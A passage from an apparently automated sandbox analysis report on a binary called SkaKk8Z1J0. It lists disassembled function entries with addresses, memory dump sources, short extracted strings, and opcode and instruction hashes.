                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                  Function 00437399 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$kl
                                                                                                                                                                                                                                                  • API String ID: 0-2631956018
                                                                                                                                                                                                                                                  • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                  • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                  Function 0074ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: BE$de
                                                                                                                                                                                                                                                  • API String ID: 0-1272349043
                                                                                                                                                                                                                                                  • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                  • Instruction ID: e2410194d29b844085c2c9898a9ec3071238530d5795570b911b814fdebd83cb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAD118B165C3648BD728DF2888516AFFBD2EBD5304F18492CE8E19B391D779C906C782
                                                                                                                                                                                                                                                  Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: BE$de
                                                                                                                                                                                                                                                  • API String ID: 0-1272349043
                                                                                                                                                                                                                                                  • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                  • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                  Function 007445D7 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: )$IEND
                                                                                                                                                                                                                                                  • API String ID: 0-707183367
                                                                                                                                                                                                                                                  • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                  • Instruction ID: e9c83421548ae46b0dfba5b0d74997306d0d2103b52bd8126005845c9dae55a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD19DB1908348DFE720CF18C845B5BBBE4AF95304F14892DF9999B381D779E908DB92
                                                                                                                                                                                                                                                  Function 004239F2 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                  • API String ID: 0-1414831546
                                                                                                                                                                                                                                                  • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                  • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                  Function 0076B427 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Fg$RU]l
                                                                                                                                                                                                                                                  • API String ID: 0-3680832515
                                                                                                                                                                                                                                                  • Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                  • Instruction ID: 030bbbb19408fc868fa562674ff991d56be647137b8a669c3501d5add5a51960
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A71E77121D3C08BE7758F24C8617EA7BD2EBD3314F18996DD4DA87292DB39444ACB12
                                                                                                                                                                                                                                                  Function 0042B1C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Fg$RU]l
                                                                                                                                                                                                                                                  • API String ID: 0-3680832515
                                                                                                                                                                                                                                                  • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                  • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                                                                                                                                                                                                                  Function 004256F9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: O28+$h
                                                                                                                                                                                                                                                  • API String ID: 0-657163135
                                                                                                                                                                                                                                                  • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                  • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                  Function 0077CD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: @$ihgf
                                                                                                                                                                                                                                                  • API String ID: 0-73152791
                                                                                                                                                                                                                                                  • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                  • Instruction ID: c419f38526918fba7c815603210c1c5d8250d9ac2a2e9d94957ba9da901652e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F04125B1A043018BDB15CF24C84267BB7A6FFD6358F14862CE4999B291E779D805CBC2
                                                                                                                                                                                                                                                  Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: @$ihgf
                                                                                                                                                                                                                                                  • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                  • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                  • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                  Function 0075554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Z\$^P
                                                                                                                                                                                                                                                  • API String ID: 0-3724859648
                                                                                                                                                                                                                                                  • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                  • Instruction ID: 63b7a410eaefcad43ebe5e782b0eaddcb0222e33ac99cbc8deb4a630ca2fce28
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41F2B1911A00CFC718CF28C8A2AA2B7B2FF49314B16C19CD4978F7A5E778E911CB55
                                                                                                                                                                                                                                                  Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: AzB$`rB
                                                                                                                                                                                                                                                  • API String ID: 0-365317308
                                                                                                                                                                                                                                                  • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                  • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                  Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: AzB$`rB
                                                                                                                                                                                                                                                  • API String ID: 0-365317308
                                                                                                                                                                                                                                                  • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                  • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                  Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: c$
                                                                                                                                                                                                                                                  • API String ID: 0-2516980088
                                                                                                                                                                                                                                                  • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                  • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                  Function 00779A97 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                                                                                                                  • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                  • Instruction ID: d94ca7fa8ab871151821450218283340bca7fa42ce996efb535a931ca584f410
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A22E1756093419FEB14CF25C880B2EBBE2BBD5354F18CA2CE59987391DB78D805CB92
                                                                                                                                                                                                                                                  Function 00439830 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                  • Opcode ID: b46a8015aa8989e18fcfc994abe159656f3f5075906cadacb80bce7823f6c0cd
                                                                                                                                                                                                                                                  • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b46a8015aa8989e18fcfc994abe159656f3f5075906cadacb80bce7823f6c0cd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                                                                                                                                                                                                                  Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: A67H
                                                                                                                                                                                                                                                  • API String ID: 0-3389657328
                                                                                                                                                                                                                                                  • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                  • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                  Function 00758F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: [
                                                                                                                                                                                                                                                  • API String ID: 0-3878419350
                                                                                                                                                                                                                                                  • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                  • Instruction ID: eaa5d93ade8e28bb7bcf200fd22665d4bd421da815917645b59703de91970f01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44022075600702CBCB24CF29C8D16A3B7F2FF95314B19859CC9864BBA5EB79E846CB50
                                                                                                                                                                                                                                                  Function 00776E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ,)*k
                                                                                                                                                                                                                                                  • API String ID: 0-1228391949
                                                                                                                                                                                                                                                  • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                  • Instruction ID: 705aaf2f5998eb9474768d483580064b873b6db6c382e06196a70cb0f191c273
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBC15A75A083109BDB18DF24C884A3FB7E2ABD6754F18CA2CE58957691D639DC40C792
                                                                                                                                                                                                                                                  Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ,)*k
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                  • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                  • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
